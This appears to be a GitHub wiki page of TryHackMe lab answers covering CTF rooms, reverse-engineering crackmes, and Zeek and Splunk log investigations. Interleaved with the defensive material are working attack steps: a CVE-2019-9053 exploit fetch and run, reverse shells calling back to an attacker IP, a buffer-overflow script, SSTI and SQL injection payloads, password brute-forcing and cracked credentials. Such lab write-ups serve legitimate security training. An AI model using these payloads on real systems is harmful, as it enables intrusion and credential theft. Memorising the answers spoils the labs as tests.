TryHackMe ‐ All Answers - vietkim027/thm GitHub Wiki

https://tryhackme.com/room/easyctf

Q1 nmap -T4 10.10.22.177

Q2 nmap -A -p21,80,2222 -T4 10.10.22.177

Q3 dirb http://10.10.22.177 /usr/share/wordlists/dirb/big.txt

Found: http://10.10.22.177/simple (CMS Made Simple), vulnerable to CVE-2019-9053

Q4 sqli

Q5 curl -L -o exploit.py https://github.com/e-renna/CVE-2019-9053/raw/master/exploit.py

python3 exploit.py -u http://10.10.22.177/simple --crack -w /usr/share/wordlists/SecLists/Passwords/Common-Credentials/best110.txt

If the bundled wordlist does not crack it, take the hash and salt from the exploit output and run hashcat in mode 20 (md5($salt.$pass), the layout CMS Made Simple uses):

hashcat -m 20 '0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2' .\wordlist\rockyou.txt

Password: secret
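The hashcat mode matters: -m 20 hashes the salt in front of the password, -m 10 hashes it after, and picking the wrong one never cracks anything. The script below is an added example (not part of the original notes or of the exploit) that shows the difference offline. It reuses the salt quoted above but rebuilds the target hash from a known password, so the hash it cracks is constructed here, not the one from the target; the five-word list stands in for rockyou.txt.

```python
import hashlib

# Salt from the exploit output above; the target hash is constructed from a
# known password so the example runs offline (it is NOT the target's real hash).
SALT = "1dac0d92e9fa6bb2"
TARGET = hashlib.md5((SALT + "secret").encode()).hexdigest()

# Constructed mini wordlist standing in for rockyou.txt
WORDLIST = ["123456", "password", "letmein", "secret", "sunshine"]

# hashcat mode -> how the salt is combined with the candidate before MD5
MODES = {
    20: lambda salt, pw: salt + pw,   # md5($salt.$pass): what CMS Made Simple stores
    10: lambda salt, pw: pw + salt,   # md5($pass.$salt): the other common layout
}

def crack_salted_md5(target_hex, salt, candidates, modes=MODES):
    """Return (hashcat_mode, password) for the first candidate whose salted MD5
    matches target_hex under any of the given modes, or None if nothing matches."""
    target_hex = target_hex.lower()
    for pw in candidates:
        for mode, combine in modes.items():
            if hashlib.md5(combine(salt, pw).encode()).hexdigest() == target_hex:
                return mode, pw
    return None

if __name__ == "__main__":
    print(crack_salted_md5(TARGET, SALT, WORDLIST))
```

Running it reports mode 20 together with the password; restricting the search to mode 10 finds nothing, which is exactly the failure you see when the wrong hashcat mode is chosen.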

Q6 ssh -p 2222 <user>@10.10.22.177 (the account the exploit recovered, password secret) Answer: ssh

Q7 G00d j0b, keep up!

Q8 sunbath

Q9 sudo -l

vim is allowed: sudo vim -c ':!/bin/sh'

W3ll d0n3. You made it!

Fuel CMS 1.4, CVE-2018-16763

nano exploit.py

python3 exploit.py -u http://10.10.12.223

cd /usr/share/exploits/vulnerabilitiescapstone

nc -nlvp 8081

python3 exploit.py 10.10.12.223 <attacker IP>:8081 (the second argument is the address the reverse shell calls back to, i.e. the nc listener)

cd /home/ubuntu

Heartbleed: nmap -sV --script vuln [IP]

msfconsole

search heartbleed

use auxiliary/scanner/ssl/openssl_heartbleed

show options

set rhost [IP]

set verbose true

run (run it again if the first dump of leaked memory contains nothing useful)

https://tryhackme.com/room/reverselfiles

Task 1: file crackme1; chmod +x crackme1; ./crackme1

Task 2: strings crackme2 shows the password; ./crackme2 super_secret_password

Task 3: strings crackme3 (or r2 -A crackme3) shows a base64 string; decode it with echo <base64 string> | base64 -d

Task 4

Method 1: r2 -A crackme4, break after the comparison and dump the compared string with px @ rax

Method 2: strings crackme4

Using radare2 in debug mode:

r2 -d ./crackme4 password

aa

afl | grep main

pdf @main

pdf @sym.compare_pwd

db 0x0040006cf

dc

px @ rbp-0x20

Task 5: strings crackme5

Method 1: r2 -A crackme5, then px @ rdx

Method 2:

r2 -d ./crackme5

aa

afl | grep main

pdf @main

pdf @sym.compare_pwd

db 0x004000829

db 0x004000834

dc

px @ rbp-0x30

px @ rbp-0x50

./crackme5 OfdlDSA|3tXb32~X3tX@sX`4tXtz

Task 6: chmod +x crackme6. Use Ghidra (https://ghidra-sre.org/) as a decompiler.

Go to the main function; it calls compare_pwd.

Looking at compare_pwd, decompile my_secure_test.

We get 313333375f707764. Visit https://toolbox.googleapps.com/apps/encode_decode/ and choose Hex Decode (the bytes decode to the ASCII string 1337_pwd).

Task 7: Run Ghidra and look at the main function: local_14 == 0x7a69. Convert hex to decimal (https://www.convzone.com/hex-to-decimal/): 31337. ./crackme7 31337

Task 8: Run Ghidra and look at the main function: iVar2 == -0x35010ff3. Convert hex to decimal (https://www.convzone.com/hex-to-decimal/): -889262067. ./crackme8 -889262067

Task 2: Investigate the dns-tunneling.pcap file. Investigate the dns.log file. What is the number of DNS records linked to the IPv6 address?

cd anomalous-dns/

zeek -r dns-tunneling.pcap

cat dns.log | less

cat dns.log | zeek-cut qtype_name | grep "AAAA" | sort | uniq -c (AAAA is the IPv6 record type) A: 320

Investigate the conn.log file. What is the longest connection duration? cat conn.log | zeek-cut duration | sort -n | tail -1 A: 9.420791

Investigate the dns.log file. Filter all unique DNS queries. What is the number of unique domain queries? cat dns.log | zeek-cut query | rev | cut -d '.' -f 1-2 | rev | sort | uniq | wc -l Answer: 6

There are a massive amount of DNS queries sent to the same domain. This is abnormal. Let’s find out which hosts are involved in this activity. Investigate the conn.log file. What is the IP address of the source host? cat conn.log | zeek-cut id.orig_h id.resp_h | sort -n | uniq -c A: 10.20.57.3

Task 3 cd phishing/ zeek -r phishing.pcap Investigate the logs. What is the suspicious source address? Enter your answer in defanged format.

cat dhcp.log | less

cat dhcp.log | zeek-cut client_addr | uniq | sed -e 's/\./[.]/g' (the dot must be escaped; an unescaped . matches every character) Answer: 10[.]6[.]27[.]102

Investigate the http.log file. Which domain address were the malicious files downloaded from? Enter your answer in defanged format. cat http.log | less

cat http.log | zeek-cut host | grep "smart-fax" | uniq | sed -e 's/\./[.]/g' Answer: smart-fax[.]com

Investigate the malicious document in VirusTotal. What kind of file is associated with the malicious document? zeek -C -r phishing.pcap hash-demo.zeek

ls

cat files.log | less

cat files.log | zeek-cut mime_type md5 | grep "word"

Search the MD5 b5243ec1df7d1d5304189e7db2744128 on https://www.virustotal.com/ Answer: VBA

Investigate the extracted malicious .exe file. What is the given file name in Virustotal? cat files.log | zeek-cut mime_type md5 | grep "exe" PleaseWaitWindow.exe

Investigate the malicious .exe file in VirusTotal. What is the contacted domain name? Enter your answer in defanged format. echo hopto.org | sed -e 's/\./[.]/g' Answer: hopto[.]org

Investigate the http.log file. What is the request name of the downloaded malicious .exe file? cat http.log | grep "exe" knr.exe

Task 4 Investigate the log4shell.pcapng file with the detection-log4j.zeek script. Investigate the signatures.log file. What is the number of signature hits?

cd log4j/

zeek -C -r log4shell.pcapng detection-log4j.zeek

cat signatures.log | less

cat signatures.log | zeek-cut note | uniq -c A: 3

Investigate the http.log file. Which tool is used for scanning? cat http.log | less cat http.log | zeek-cut user_agent | sort | uniq Nmap

Investigate the http.log file. What is the extension of the exploit file? cat http.log | zeek-cut uri | sort | uniq .class

Investigate the log4j.log file. Decode the base64 commands. What is the name of the created file? cat log4j.log | zeek-cut uri | sort -nr | uniq

echo dG91Y2ggL3RtcC9wd25lZAo= | base64 -d (gives touch /tmp/pwned) Answer: pwned
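The dns.log, conn.log and http.log steps above all do the same thing: pick columns by name with zeek-cut, then count, deduplicate or sort. As an added example (not part of the original notes, and not data from the room's pcap), here is that workflow in Python over a constructed five-record dns.log: the parser reads the #fields header the way zeek-cut does, and the helpers count AAAA records, list the unique registrable domains and find the busiest source host. The domain names and addresses in the sample are made up.

```python
from collections import Counter

# Constructed Zeek-style dns.log: tab separated, #fields header, #close trailer.
SAMPLE_DNS_LOG = "\n".join([
    "#separator \\x09",
    "#fields\tts\tid.orig_h\tid.resp_h\tquery\tqtype_name",
    "1.0\t10.20.57.3\t10.20.57.2\tabc.tunnel.example.net\tAAAA",
    "2.0\t10.20.57.3\t10.20.57.2\tdef.tunnel.example.net\tAAAA",
    "3.0\t10.20.57.3\t10.20.57.2\twww.example.com\tA",
    "4.0\t10.20.57.4\t10.20.57.2\tghi.tunnel.example.net\tAAAA",
    "5.0\t10.20.57.4\t10.20.57.2\tmail.example.org\tA",
    "#close\t2022-01-01-00-00-00",
])

def parse_zeek_log(text):
    """Yield one dict per record, keyed by the names in the #fields header
    (the same column names zeek-cut selects by). Comment lines are skipped."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            yield dict(zip(fields, line.split("\t")))

def count_qtype(records, qtype):
    """Number of queries of the given type, e.g. 'AAAA' for IPv6 records."""
    return sum(1 for r in records if r["qtype_name"] == qtype)

def registrable_domain(query):
    """Last two labels of the name: the part a tunnelling tool keeps constant
    while it varies the subdomain labels that carry the data."""
    return ".".join(query.rstrip(".").split(".")[-2:])

def unique_domains(records):
    """Sorted list of distinct registrable domains (the 'unique domain queries' count)."""
    return sorted({registrable_domain(r["query"]) for r in records})

def busiest_origin(records):
    """(source IP, record count) for the host sending the most queries."""
    return Counter(r["id.orig_h"] for r in records).most_common(1)[0]

if __name__ == "__main__":
    recs = list(parse_zeek_log(SAMPLE_DNS_LOG))
    print("AAAA records:", count_qtype(recs, "AAAA"))
    print("unique domains:", unique_domains(recs))
    print("busiest origin:", busiest_origin(recs))
```

Materialise the generator with list() once and reuse it; each helper walks the records independently, which mirrors running a separate zeek-cut pipeline per question.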

nmap --open 10.10.112.42

Hidden TAG Header: curl 10.10.112.42 -I

SSH Flag nc 10.10.112.42 22

FTP: nmap -T4 -sV -p 22,139,10021 10.10.112.42

hydra -l quinn -P /usr/share/wordlists/rockyou.txt 10.10.112.42 ftp -s 10021

ftp 10.10.112.42 10021

Open 10.10.112.42:8080 in a web browser

nmap -sN 10.10.112.42

Question 1

What does SMB stand for? Server Message Block

Question 2 What type of protocol is SMB? response-request

Question 3 What do clients connect to servers using? TCP/IP

Question 4 What systems does Samba run on? Unix

Task 3 Conduct an Nmap scan of your choosing. How many ports are open? 3

Question 2 What ports is SMB running on? 139/445

Let’s get started with enum4linux, conduct a full basic enumeration. For starters, what is the workgroup name?

nmap -A IP

enum4linux -a IP

Answer: WORKGROUP

Question 4 What comes up as the name of the machine? nmap -A -p- IP polosm

Question 5 What operating system version is running? (Check enum4linux above) 6.1

Question 6 What share sticks out as something we might want to investigate? (Check enum4linux above) Ans: profiles

Task 4 Question 1

What would be the correct syntax to access an SMB share called “secret” as user “suit” on a machine with the IP 10.10.115.90 on the default port?

smbclient //10.10.115.90/secret -U suit -p 445

4.2 smbclient //10.10.115.90/profiles -p 445 (anonymous login, press Enter at the password prompt) Y

4.3, 4.4 smb: \> ls

Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to? john cactus

What service has been configured to allow him to work from home? SSH

Okay! Now we know this, what directory on the share should we look in? (command: ls) .ssh

This directory contains authentication keys that allow users to authenticate themselves on and then access a server. Which of these keys is most valuable to us? cd .ssh ls Ans: id_rsa

What is the smb.txt flag?

cd .ssh

ls

mget id_rs*

In a new terminal:

chmod 600 id_rsa

cat id_rsa.pub (the comment at the end of the public key gives the username, cactus)

ssh -i id_rsa cactus@10.10.115.90

ls

cat smb.txt

Task 5 Question 1

What is Telnet?

Application protocol

Question 2

What has slowly replaced Telnet?

SSH

Question 3

How would you connect to a Telnet server with the IP 10.10.10.3 on port 23?

telnet 10.10.10.3 23

Question 4

The lack of what means that all Telnet communication is in plaintext?

Encryption

Task 6 nmap -T4 -A -p- 10.10.115.90 How many ports are open on the target machine? 1

Question 2

What port is this? Note: This is asking which port is open.

8012

Question 3

This port is unassigned but still lists the protocol it’s using; what protocol is this?

TCP

Question 4

Now re-run the Nmap scan, without the -p- tag; how many ports show up as open? nmap -T4 -A 10.10.115.90 0

Question 6

Based on the title returned to us, what do we think this port could be used for? A backdoor

Who could it belong to? Gathering possible usernames is an essential step in an enumeration. Skidy

Task 7 (Keep This Task, Don't Exit terminal) telnet 10.10.115.90 8012 Great! It’s an open telnet connection! What welcome message do we receive? Ans: SKIDY’S BACKDOOR.

(Keep This Task, Don't Exit terminal)

Let’s try executing some commands. Do we get a return on any input we enter into the telnet session? (Y/N) Ans: N

On the attacker: sudo tcpdump ip proto \\icmp -i eth0 (or tun0, whichever interface faces the target)

In the telnet session: .RUN ping <attacker IP> -c 1

Do we receive any pings? Note, you need to preface this with .RUN (Y/N) Y

msfvenom -p cmd/unix/reverse_netcat lhost=<attacker IP> lport=4444 R (the generated payload starts with mkfifo) Ans: mkfifo

Open a new terminal (keep the telnet session open): nc -lvp 4444

Back in the telnet session, run the generated payload with the .RUN prefix; the listener receives the shell.

ls

cat flag.txt

Task 8 FTP Question 1

What communication model does FTP use? Client-server

Question 2 What’s the standard FTP port? 21

Question 3 How many modes of FTP connection are there? 2

Task 9 Enum FTP How many ports are open on the target machine? nmap -A -p- 10.10.115.90 Ans: 2

Question 2 What port is FTP running on? 21

Question 3 What variant of FTP is running on it? export ip=10.10.115.90 nmap -sV -oN nmap-$ip.out $ip cat nmap-$ip.out | grep open

Q4 What is the name of the file in the anonymous FTP directory?

ftp IP, log in as anonymous, press Enter at the password prompt Ans: PUBLIC_NOTICE.txt

Q5 What do we think a possible username could be? get PUBLIC_NOTICE.txt Ans: mike

T10 hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV 10.10.16.71 ftp

nmap 10.10.67.22

nmap -sC -p135,443,445 10.10.67.22 -oN services_scan.txt

sudo nano /etc/hosts (add 10.10.67.22 set.windcorp.thm)

Visit https://set.windcorp.thm

gobuster dir -u https://set.windcorp.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k

gobuster dir -u https://set.windcorp.thm/assets -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k

View page source https://set.windcorp.thm/assets/js/search.js https://set.windcorp.thm/assets/data/users.xml

curl -k https://set.windcorp.thm/assets/data/users.xml -o users.xml

Extracting the usernames from users.xml (xmllint prints the matched elements on one line, so split on the closing tag before stripping the opening tag and domain):

xmllint --xpath "//row/email" users.xml | sed -e 's/<\/email>/\n/g' -e 's/<email>//g' -e 's/@windcorp.thm//g' | sed '/^$/d' > users.txt
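The sed chain is fragile (it depends on xmllint's output layout and silently keeps duplicate or oddly cased entries). As an added example, not part of the original notes, here is the same extraction with a real XML parser. The XML below is constructed in the shape the XPath //row/email implies; the names in it are made up, and extract_usernames and write_users_file are my own helpers.

```python
import xml.etree.ElementTree as ET

# Constructed sample with the <row><email>...</email></row> layout the XPath above
# assumes; the accounts are invented, including a duplicate, a mixed-case address
# and a row without an email, to show the edge cases the sed pipeline ignores.
SAMPLE_USERS_XML = """<?xml version="1.0"?>
<rows>
  <row><name>Example One</name><email>exampleone@windcorp.thm</email></row>
  <row><name>Example Two</name><email>EXAMPLETWO@windcorp.thm</email></row>
  <row><name>Example One again</name><email>exampleone@windcorp.thm</email></row>
  <row><name>Other tenant</name><email>someone@example.org</email></row>
  <row><name>No mail</name></row>
</rows>
"""

def extract_usernames(xml_text, domain="windcorp.thm"):
    """Return the unique local parts of every //row/email in the given domain,
    lower-cased and in first-seen order, ready to be used as a user list."""
    # ElementTree does not resolve external entities, so a hostile users.xml
    # cannot pull local files through XXE here; still, only parse data you fetched.
    root = ET.fromstring(xml_text)
    seen, users = set(), []
    for email in root.iterfind("./row/email"):
        addr = (email.text or "").strip().lower()
        local, sep, dom = addr.partition("@")
        if sep and dom == domain and local and local not in seen:
            seen.add(local)
            users.append(local)
    return users

def write_users_file(path, users):
    """Write one username per line, the format hydra/kerbrute/gobuster expect."""
    with open(path, "w") as fh:
        fh.write("\n".join(users) + "\n")

if __name__ == "__main__":
    names = extract_usernames(SAMPLE_USERS_XML)
    write_users_file("users.txt", names)
    print(names)
```

Filtering on the domain keeps addresses from other tenants out of the spray list, and lower-casing avoids trying the same account twice under different spellings.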

brute force valid accounts

gobuster dir -k -u https://set.windcorp.thm/ -w /usr/share/dirbuster/wordlists/directory-list-1.0.txt -x txt,asp,aspx,html -q -t 50 -o gobuster_dir.txt

myrtleowe:Passw@rd

Listing all shares:

smbclient -L //set.windcorp.thm -U myrtleowe

smbclient //10.10.67.22/Files -U myrtleowe

ls get Info.txt

Task 2 cd /tools/mslink; ./mslink.sh -l vietkim -n shortcut -i '\\<attacker IP>\vietkim' -o shortcut.lnk (the icon path points at the attacker's SMB listener, so whoever browses the share authenticates to it; use the tun0 address, not the target's)

zip myfile.zip shortcut.lnk

responder -I tun0

Upload file to share smbclient //10.10.67.22/Files -U myrtleowe put myfile.zip exit

sudo python3 /opt/impacket/examples/smbserver.py -smb2support share .

Credentials obtained: user MichelleWat, password !!!MICKEYmouse

Install evil-winrm tool

gem install evil-winrm

evil-winrm -i 10.10.67.22 -u MichelleWat -p '!!!MICKEYmouse'

cd Desktop dir type Flag2.txt

Don't Exit this Windows

Task 3 (in the evil-winrm shell):

netstat -ao

Get-Process

Port 2805 is attached to the process with PID 3524: Get-Process -Id 3524

cd "Veeam ONE Agent"

(Get-Item Veeam.One.Agent.Service.exe).VersionInfo.FileVersion → 9.5.4.4566

Forward port 2805 back to the attacker with plink (downloaded from the attacker's HTTP server, see below):

Invoke-WebRequest -Uri http://<attacker IP>/plink.exe -OutFile plink.exe

echo y | & ./plink.exe -ssh -l attacker -pw s3cr3t -N -R <attacker IP>:2805:127.0.0.1:2805 <attacker IP>

On the attacker (Linux):

sudo python3 /opt/impacket/examples/smbserver.py -smb2support -username fun -password fun share .

nc -lnvp 4444

cd Desktop (the directory holding plink.exe)

python -m SimpleHTTPServer 80

nmap -p2805 localhost (confirms the forwarded Veeam ONE Agent port is reachable)

In msfconsole, with the module for this Veeam ONE Agent version: set rhosts 127.0.0.1, check options, run

https://tryhackme.com/room/nonamectf

sudo nano bof.py

```python
import telnetlib   # deprecated and removed in Python 3.13; use 3.12 or older, or replace with socket
import argparse

parser = argparse.ArgumentParser(description="BOF Exploit")
parser.add_argument("host", help="The host IP address")
parser.add_argument("port", help="The host port")
args = parser.parse_args()

# Read and write helpers
def read(end_text):
    tn.read_until(end_text.encode())

def write(text):
    tn.write(("{0}\n".format(text)).encode())

# Connect
tn = telnetlib.Telnet(args.host, args.port)

# Register/Login
for i in range(1, 3):
    read("4")          # Listen for the end of the welcome message
    write(str(i))      # Pick an option (1 the first time, 2 the second)
    read(":")          # Wait for the end of the username prompt
    write("jesus")     # Enter username
    read(":")          # Wait for the end of the password prompt
    write("soon")      # Enter password

# Store buffer
read("4")              # Listen for the end of the welcome message
write("4")             # Pick option 4 to store a buffer
read(":")              # Listen for the end of the buffer prompt
write("A" * 1998)      # Calculate and store the buffer

# Complete overflow
read("4")              # Listen for the end of the welcome message
write("3")             # Pick option 3 to receive our secret directory
read("\n")             # Work around to get rid of the newline preceding the response
print(tn.read_until("\n".encode()).decode())  # Output the directory
```

python3 bof.py 10.10.174.138 2222

Secret directory returned by the overflow:

http://10.10.174.138:9090/40b5dffec4e39b7a3e9d261d2fc4a038/

http://10.10.174.138:9090/40b5dffec4e39b7a3e9d261d2fc4a038/?hackme=whoami

SSTI probe (if the page renders 49, the parameter is evaluated as a template):

http://10.10.174.138:9090/40b5dffec4e39b7a3e9d261d2fc4a038/?hackme={{7*7}}

Command execution through the template engine, URL-encoded form of {% import os %}{{ os.popen("whoami").read() }}:

http://10.10.174.138:9090/40b5dffec4e39b7a3e9d261d2fc4a038/?hackme={%%20import%20os%20%}{{%20os.popen(%22whoami%22).read()%20}}

THM{SSTI_AND_BUFFER_OVERFLOW_W4S_HERE}

THM{F4KE_PIP_PACKAGE_INSTALL}

Q: How many events were returned for the month of March 2022?

1482

Question: What is the IP associated with the suspected user in the logs? 192.166.65.54

Q: The user’s machine used a legit windows binary to download a file from the C2 server. What is the name of the binary? bitsadmin

Q: The infected machine connected with a famous filesharing site in this period, which also acts as a C2 server used by the malware authors to communicate. What is the name of the filesharing site? pastebin.com

Q: What is the full URL of the C2 to which the infected host is connected? pastebin.com/yTg0Ah6a

Q: A file was accessed on the filesharing site. What is the name of the file accessed? secret.txt

Q: The file contains a secret code with the format THM{_____}.

THM{SECRET_CODE}

Splunk: How many events were collected and ingested in the index main? index="main" A: 12256

“On one of the infected hosts, the adversary was successful in creating a backdoor user. What is the new username?” Cmd: index="main" EventID="4720" A: A1berto

“On the same host, a registry key was also updated regarding the new backdoor user. What is the full path of that registry key?” Cmd: index="main" EventID="13" a1berto A: HKLM\SAM\SAM\Domains\Account\Users\Names\A1berto

“Examine the logs and identify the user that the adversary was trying to impersonate.” Cmd: index="main" A: Cybertees\A1berto

“What is the command used to add a backdoor user from a remote computer?” Cmd: index="main" EventID="1" A: "C:\windows\System32\Wbem\WMIC.exe" /node:WORKSTATION6 process call create "net user /add A1berto paw0rd1"

“How many times was the login attempt from the backdoor user observed during the investigation?” Cmd: index="main" User="A1berto" A: 0

“What is the name of the infected host on which suspicious Powershell commands were executed?” Cmd: index="main" powershell A: James.Browne

“PowerShell logging is enabled on this device. How many events were logged for the malicious PowerShell execution?” index="main" EventID="4103" 79

“An encoded Powershell script from the infected host initiated a web request. What is the full URL?” The process command line starts with C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noP -sta -w 1 -enc <base64>

Linux terminal: echo $STRING > base64.txt && base64 --decode base64.txt (the -enc argument is UTF-16LE, so pipe the result through iconv -f UTF-16LE -t UTF-8 for clean text)

The decoded script contains a second base64 layer:

$ser=$([TeXT.ENCodiNG]::UnicodE.GetStriNG([CoNVeRT]::FroMBASe64StRInG('aAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADAALgA1AA==')));$t='/news.php'

The inner string decodes to http://10.10.10.5, and $t supplies the path. Defanged answer: hxxp[://]10[.]10[.]10[.]5/news[.]php
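Decoding -enc blobs by hand is error-prone: the outer layer is base64 of UTF-16LE text, and the inner FromBase64String literals are usually UTF-16LE as well when GetString is called on the Unicode encoding, as here. The script below is an added example, not part of the original notes or of Splunk. It builds a constructed -enc argument from the script fragment quoted above (so the encoded command itself is synthetic, while the inner base64 string is the one from the logs), peels both layers, reassembles the URL and defangs it. The function names are my own.

```python
import base64
import re

def build_encoded_command(script):
    """Constructed helper: produce what powershell.exe -enc expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()

def decode_encoded_command(enc):
    """Reverse of -enc: base64 -> UTF-16LE text."""
    return base64.b64decode(enc).decode("utf-16-le")

# Matches [Convert]::FromBase64String('...') regardless of the random casing
# attackers use to dodge string matching.
_B64_CALL = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)", re.IGNORECASE)

def decode_nested_base64(script):
    """Decode every FromBase64String('...') literal in the script as UTF-16LE,
    the encoding the sample passes to GetString via [Text.Encoding]::Unicode."""
    return [base64.b64decode(m).decode("utf-16-le") for m in _B64_CALL.findall(script)]

def extract_c2_url(enc):
    """Decode the -enc blob, take the first nested base64 host and append the $t path."""
    script = decode_encoded_command(enc)
    hosts = decode_nested_base64(script)
    path = re.search(r"\$t='([^']*)'", script)
    return hosts[0] + (path.group(1) if path else "")

def defang(url):
    """Neutralise a URL for a report: http -> hxxp, :// -> [://], . -> [.]"""
    url = re.sub(r"^https?", lambda m: m.group(0).replace("tt", "xx"), url)
    url = url.replace("://", "[://]")
    return url.replace(".", "[.]")

# The script fragment from the logs above; the -enc wrapper is constructed here.
SAMPLE_SCRIPT = ("$ser=$([TeXT.ENCodiNG]::UnicodE.GetStriNG([CoNVeRT]::FroMBASe64StRInG("
                 "'aAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADAALgA1AA==')));$t='/news.php'")
SAMPLE_ENC = build_encoded_command(SAMPLE_SCRIPT)

if __name__ == "__main__":
    print(defang(extract_c2_url(SAMPLE_ENC)))
```

Search the decoded text for further FromBase64String or -enc layers before trusting the result; Empire-style stagers often nest more than one.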

SQL injection payload (closes the current string value and sets nickName to the contents of the secrets table via group_concat):

',nickName=(SELECT group_concat(profileID || "," || id || "," || author || "," || secret || ":") from secrets),email='

Task 6 echo '10.10.152.33 webenum.thm' | sudo tee -a /etc/hosts

gobuster dir -u http://webenum.thm/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -t 128

Flag in webenum.thm/VIDEO/flag.php

Virtual Host: gobuster vhost -u http://webenum.thm/ -w DNSsubdomains-top1million-5000.txt -t128

echo '10.10.137.133 learning.webenum.thm' | sudo tee -a /etc/hosts echo '10.10.137.133 products.webenum.thm' | sudo tee -a /etc/hosts

gobuster dir -u http://products.webenum.thm/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -x txt -t128

Task 8 What would be the full URL for the theme "twentynineteen" installed on the WordPress site: "http://cmnatics.playground" A: http://cmnatics.playground/wp-content/themes/twentynineteen

What argument would we provide to enumerate a WordPress site? A: enumerate

What is the name of the other aggressiveness profile that we can use in our WPScan command? A: passive

Task 9 echo '10.10.137.133 wpscan.thm' | sudo tee -a /etc/hosts

wpscan --url wpscan.thm -e t

Enumerate the site, what is the name of the theme that is detected as running? A: twentynineteen

WPScan says that this theme is out of date, what does it suggest is the number of the latest version? A: 2.0

Enumerate the site, what is the name of the plugin that WPScan has found? wpscan --url wpscan.thm -e p A: nextgen-gallery

Enumerate the site, what username can WPScan find? wpscan --url wpscan.thm -e u A: Phreakazoid

Construct a WPScan command to brute-force the site with this username, using the rockyou wordlist as the password list. What is the password to this user? wpscan --url wpscan.thm --usernames phreakazoid --passwords /usr/share/wordlists/rockyou.txt A: linkinpark

Task 11 What argument would we use if we wanted to scan port 80 and 8080 on a host? -p 80,8080

What argument would we use if we wanted to see any cookies given by the web server? -Display 2

Task 12 What is the name & version of the web server that Nikto has determined running on port 80? nikto -h 10.10.137.133 (port 80 is the default)

Apache/2.4.7

There is another web server running on another port. What is the name & version of this web server? nmap -n -sV 10.10.137.133

Apache-Coyote/1.1

What is the name of the Cookie that this JBoss server gives? nikto -h 10.10.137.133 -p 8080 -Display 2 JSESSIONID
